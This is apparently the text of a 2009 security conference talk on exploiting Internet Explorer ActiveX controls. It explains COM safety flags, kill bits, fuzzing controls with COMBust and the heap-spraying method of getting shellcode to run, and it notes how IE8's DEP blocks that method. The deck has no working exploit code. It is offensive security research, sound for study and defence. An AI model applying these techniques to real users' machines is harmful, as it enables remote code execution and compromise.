ActiveX Xploitation In 2009

Who The Hell Am I ?

Hi, My Name Is Paul Craig. Principal Security Consultant . Security-Assessment.com “I hack things.” Google Me (I have hacked lots of things)

Agenda

What Is ActiveX & How Does it Work

ActiveX Vulnerabilities

Finding ActiveX Vulnerabilities

Why Everything Is Different With IE 8

Shell Poppin’

What Is ActiveX? ActiveX Is part of COM

Component Object Model Includes: OLE, OLE Automation, ActiveX, COM+, DCOM COM is a language neutral method of implementing objects. Objects can be easily reused by other applications.

1996 Microsoft renamed Internet OLE controls to ‘ActiveX’. ActiveX was designed as the internet component of COM. Widely used throughout the Windows environment. Become the most popular component of COM.

COM objects are referenced by a ClassID or ProgID “CLSID is a 128 bit unique-id for a software application”Eg: CLSID = {AE7AB96B-FF5E-4dce-801E-14DF2C4CD681} Programmatic Identifier is a human readable name:

WMP11.AssocFile Control’s must be registered before use (Regsvr32.exe control.dll).

ActiveX controls can be loaded by IE <object classid="clsid:22D6F312-B0F6-11D0-94AB-

0080C74C7E95"> IE uses the CoCreateInstance() method of COM. Creates a single uninitialized object of the class associated with a

specified CLSID.

Interfaces and Methods COM is based on Object Oriented Programming

COM Objects expose interfaces. Interfaces expose methods.

Methods = Functions of procedural programming.

Object.Interface.Method()MSNETOBJ.IRMGetLicense.GetLicenseFromURL(‘http://www...’)

COM Objects Are Not Typical DLL Libraries

Standard DLL ‘Exported Functions’ Not Present in COM. Available Methods are exposed through DllRegisterServer Abstracted from native operations.

All CLSIDs on Windows can be found at HKEY_CLASSES_ROOT\CLSID Which is an alias to HKEY_LOCAL_MACHINE\Software\

Classes\CLSID

ActiveX Controls Have Opt-In Security Categories For IE. Safe For Initialisation. Safe For Scripting.

Category Membership Found At: HKEY_CLASSES_ROOT\CLSID\{CLSID}\Implemented

Categories 7DD95801-9882-11CF-9FA9-00AA06C42C4 = SFI 7DD95802-9882-11CF-9FA9-00AA06C42C4 = SFS

Not supported under Windows CE.

ActiveX Security Measures

Safe For Initialization Allows a control to be initialised with persistent data. Persistent data is supplied when the control is initialised.

Input supplied using an IPersist interface. <object ...><param name=play value=test.wmv></object>

Safe For Scripting Allows a control to be initialised and scripted with dynamic data. Scripted using JavaScript/VBScript Control can be accessed, methods called freely at run time.

Input supplied using an IDispatch interface.

IObjectSaftey Interface. Control identifies its own security level “I am not safe to script!” COM subsystem validates the IObjectSaftey interface prior to

loading the control.

Object.IObjectSaftey.GetInterfaceSafteyOption INTERFACESAFE_FOR_UNTRUSTED_DATA = SFS INTERFACESAFE_FOR_UNTRUSTED_CALLER = SFI

SetInterfaceSafteyOption also supported. Only security method supported by Windows CE.

Internet Explorer v6 Backward Compatibility Supported HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\ActiveX Compatibility\{CLS-ID}\Compatibility Flags COMPAT_SAFEFOR_LOADING = 0x00800000 “This compatibility flag can be used to disable the Internet

Explorer 7 IObjectSaftey check and revert back to Microsoft Internet Explorer 6 behaviour”

ActiveX Kill Bit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\ActiveX Compatibility\{CLS-ID}\Compatibility Flags 0x00000400 = EVIL_BIT (Kill bit) Kill’d CLS-ID’s cannot be loaded by IE. Updated Kill Bit lists distributed through Windows Update.

Querying An ActiveX Control Using OLEView we can query an ActiveX through its TypeLib

Type libraries describe the contents of a COM component. Exposed interfaces, methods, properties and constants. Method type definition

TypeLib’s are either embedded with an ActiveX control. An additional .TLB file. Or not present at all.

OleView Example

ActiveX exploitation has grown with popularity 50 remote command execution bugs in ActiveX in 2006. 1 in 2001

Over 110 ActiveX exploits on MilW0rm.com Popular attack path for browser exploitation. ActiveX controls run in same context as Internet Explorer. Hacking clients is the new ‘in-thing’.

Why Is ActiveX So Insecure? Compiler security disabled: SafeSEH turned off, /GS Disabled (most) ActiveX controls use the default Windows heap allocator. Controls not sandboxed, can manipulate COM/IE functionality.

ActiveX security controls are purely opt-in Developers mark controls SFS & SFI when not required. Many controls were never designed to be scripted by IE. “There were only 7 days Internet Explorer was safe to use in the

entire year of 2004.”

ActiveX Controls are shipped with commercial software. Users are not informed about control installation.

ActiveX Bugs Can be Classified into Three Groups: Insecure Method Functionality Insecure Object Instantiation Insecure Scripting

#1 - Insecure Method Functionality. Legitimately using the method of a control, to do something

malicious. SFI or SFS exploitable. Friendly Technologies Dialler – Execute Arbitrary Commands

PBEmail Arbitrary File Overwrite (SFS + SFI)

WebLaunch Arbitrary Command Execution (SFS + SFI)

Synactis All In The Box – Null Byte File Overwrite (SFS + SFI)

#2 - Insecure Object Instantiation An ActiveX instantiated with malicious persistent input. Control only marked Safe For Initialization. User Supplied Persistent Values used as Control Parameters.

Common application development vulnerabilities. Stack/Heap overflows. Integer overflows Format String vulnerabilities

Malformed input causing an application exception. Long string supplied to a method. Long string assigned to a control property. Large numeric passed to a method.

#3 – Insecure Scripting Control marked Safe For Scripting. An ActiveX method scripted with malicious input. JavaScript/VBScript used to interact with the control. Vulnerable to common application development vulnerabilities.

Finding ActiveX Vulnerabilities. Query ActiveX’s installed on the system Lookup the UUID (GUID) value in the co-class.

Search the registry for the GUID, is it SFS? It may still be SFS without an Implemented Security Category. Axenum (Part of AXFuzz) to enumerate IObjectSaftey Settings

Fuzz the fuck out of it! I Use COMBust, simple, effective, no false-positives. combust -c {GUID}

Overwritten function pointer.

Easy Exploitation: Heap Spraying. Method pioneered by Skylined, ZenParse, Alex Sotoriv Used since 2004, still works. Use JavaScript to allocate (lots) of memory on the heap. Control the structure of the heap from JavaScript

Overwrite a function pointer/SEH/Return address Jump to the JavaScript allocated heap, execute shell-code. Develop stack and heap overflows fast!

Empty Heap Windows Address Space Layout Randomization

Heap is somewhere We don’t know where, 32 possible locations.

If you can point EIP Somewhere Where would you point?

JavaScript allocates lots of (NOP slide + Shellcode) Under certain circumstances Jscript.dll uses the common

Windows heap allocator. Use JavaScript to allocate ‘heaps of heaps.’ 0x0C0C0C0C will be one of those heaps

Get EIP here You win.

“Heap Fung Shui” – HeapLib.js Automated JavaScript Heap Manipulation : HeapLib.js Supports IE 5-7, Object oriented JavaScript API

Supports: Heap logging and debugging Allocation and freeing of blocks with arbitrary sizes High level heap manipulation (very easy) Control the heap.

Takes only minutes to create an ActiveX exploit, and pop shell. Very easy, allows for lazy exploitation. Heap spraying lacks hacker finesse. “Allocate Spray 0x0c0c0c0c everywhere, until somthing goes

there”

Why Does Heap Spraying Work? The heap (data pages) are executable in the IE 7 process. DEP is *NOT* enabled for IE 5-7 Certain JavaScript strings are stored on the shared Windows

heap. var test = “aaa” ; is not on the OS heap. var test = test.substring(0, test.length); is on the OS heap.

(Most) ActiveX controls use the generic Windows heap allocator. ActiveX heap overflow will overflow into the IE/COM heap. COM is written in Visual C++ Makes use of (thousands) of function pointers. Heap overflows often lead to function pointer overwrites.

COM makes use of (LOTS) of function pointers Function pointers are kept on the heap. You blindly overflow these function pointers with the location of

your heap spray. 0xc0c0c0c0 0xC0 = ADD al, 90 (NOP like instruction) Instruction can be executed, read, jumped to!

JavaScript allocates (lots) of memory so that 0xC0.... exists. Many COM function pointers are overflowed with c0c0c0c0. Overwritten function pointer is called by COM. 0xc0c0c0c0 is executed.. You pop shell.

It All Changes With IE 8 Internet Explorer 7 Opt-Out of DEP Due to Plug-in Compatibility Flash, Java do not support DEP.

Internet Explorer 8 is DEP opt-in by default. Flash, Java now support DEP! DEP disables code execution from the heap.

New jscript.dll which has a “Not Executable” marked heap. “Ahem, that will not work in IE 8” Anyone Can Install ActiveX’s in IE8 (Not just administrators!) Unsafe methods will still exploitable. “Click this control to active it” removed.

SiteLock Interface New method in IObjectSaftey to protect controls from being

loaded from arbitrary websites. Controls implement their own per-site control with SiteLock. Users can allow the control for a specific Web site, all Web sites

or disallow the control.

Shell Poppin’

Demo:

Find an ActiveX vulnerability Exploit it through Heap Spraying Pop shell

Easy.

All Hail The Demo God